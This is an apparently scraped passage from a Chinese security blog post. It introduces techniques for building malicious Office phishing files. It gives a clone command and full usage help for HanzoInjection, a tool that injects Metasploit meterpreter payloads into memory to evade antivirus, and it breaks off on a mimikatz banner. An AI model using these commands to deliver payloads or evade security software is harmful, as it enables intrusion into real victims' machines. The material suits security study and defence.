Office作为Windows平台下一种非常流行的办公软件,越来越多的APT攻击通过构造恶意Office文件来进行实施,这也是成功率也是比较高的一种攻击方式。当然最隐蔽,最有效的攻击方式就是通过Office办公套件的一些0day来实施攻击,但是这也同样存在一些弊端,首先不是所有人都拥有0day,其次那些已经公布的Xday可能只能针对某些固定版本的Office,所以本文重点不在如果使用Xday,而是对现在已知的一些构造Office Phishing File的方式及方法进行总结,希望对学习Hack的同学有所帮助,当然也希望,通过此文,小伙伴能避免遭受此类攻击。
下载地址:戳我 DEMO: http://player.vimeo.com/video/89782344?portrait=0&color=c9ff23
1 | git clone https://github.com/P0cL4bs/hanzoInjection.git |
使用方式:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26sage: HanzoInjection.exe [Options] [-h] [-e] [-o] [-p] [-b]
the HanzoIjection is a tool focused on injecting arbitrary codes in memory to bypass common antivirus solutions.
Developer: Mharcos Nesster (mh4x0f)
Email:mh4root@gmail.com
Site: www.chmodsecurity.com.br
Greetx: P0cL4bs Team { N4sss , MMXM , Chrislley, MovCode, joridos }
-------------------------------------------------------------------
Arguments Options:
OPTION TYPE DESCRIPTION
-e,--execute [.raw] Name of file.bin, payload metasploit type raw
-p,--payload [.raw] Payload meterpreter type [RAW] requered parameter -o [output]
-o,--output [file.cs] Output generate project file.cs injection memory payload c#
-b,--binder [NULL] Binder File EXE with encrypt file PE not requered paramenter
-h,--help [Help] show this help and exit
Example Usage:
HanzoInjection.exe -e payload_meterpreter.bin
HanzoInjection.exe -p meterpreter.bin -o injection_memory.cs
HanzoInjection.exe -b
1 | .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct 9 2015 00:33:13) |